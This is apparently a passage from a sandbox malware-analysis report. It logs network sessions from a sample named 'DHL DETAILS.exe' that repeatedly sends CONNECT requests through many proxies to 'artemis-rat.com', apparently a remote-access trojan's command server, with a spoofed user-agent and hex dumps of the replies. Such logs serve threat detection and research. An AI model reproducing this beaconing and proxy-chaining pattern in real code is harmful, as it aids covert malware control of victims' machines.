                                                                                    Mar 9, 2024 13:14:15.544397116 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 56 18 41 a9 e9 fd 80 0f ac e9 08 50 52 a8 cc 9b 1f 3e 22 b6 b8 4d 2c ac f8 28 e5 cf 1d 6e 95 06 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 4a b7 e6 de 1c 55 dd a0 53 3b ab 09 4c 0d e7 f1 b7 e5 55 61 80
                                                                                    Data Ascii: %! VAPR>"M,(n(JUS;LUa:o|y
                                                                                    Mar 9, 2024 13:14:15.717154026 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 7e f3 de 42 91 1c 8d cc bf bb c3 fb 59 0c 7f 1a d9 39 83 12 42 c3 bb 00 77 86 43 3d c7 5f 2a e0 31 e8 3a 14 d4 0b 79 fd
                                                                                    Data Ascii: (~BY9BwC=_*1:y


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    689192.168.2.552298203.30.188.247806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.111814976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.266386032 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    690192.168.2.552311104.16.109.213806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.112169027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.266624928 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    691192.168.2.55212143.163.192.3156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.112178087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    692192.168.2.552164184.178.172.28152946352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.112179041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    693192.168.2.552318104.17.171.235806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.112549067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.266861916 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    694192.168.2.55216772.206.181.105649356352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.112864971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    695192.168.2.55229650.63.12.33147386352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.112876892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    696192.168.2.552252192.111.134.1041456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.112879038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    697192.168.2.5519985.32.88.13080806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.113225937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.541388035 CET72INHTTP/1.1 200 Connection established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    698192.168.2.552346104.17.62.87806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.113228083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.269553900 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    699192.168.2.54983692.204.135.37325246352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.113287926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    700192.168.2.551468178.54.21.20380816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.113498926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    701192.168.2.552359172.67.254.127806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.114346027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.269808054 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    702192.168.2.552214154.205.152.9631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.114689112 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:15.629930019 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:16.333790064 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:17.724040031 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:20.224628925 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:22.723896980 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:25.333195925 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:30.333879948 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    703192.168.2.55210569.61.200.104361816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.117280006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    704192.168.2.54979978.128.81.220316236352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.117791891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.248564005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.364658117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.380208015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    705192.168.2.552237104.20.103.68806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.117794037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.272733927 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    706192.168.2.55224634.23.45.223806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.119910002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.645598888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.334105015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.724195957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.072774887 CET811INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Server: Apache/2.4.58 (Ubuntu)
                                                                                    Content-Length: 619
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 73 6f 70 6f 72 74 65 74 69 40 63 6f 64 65 31 30 30 2e 63 6f 6d 2e 70 79 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at soporteti@code100.com.py to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    707192.168.2.5520993.37.125.7631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.120783091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.442336082 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    708192.168.2.5521723.10.93.5031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.123048067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.416344881 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    709192.168.2.552254172.214.74.10531286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.125011921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.645569086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.334088087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
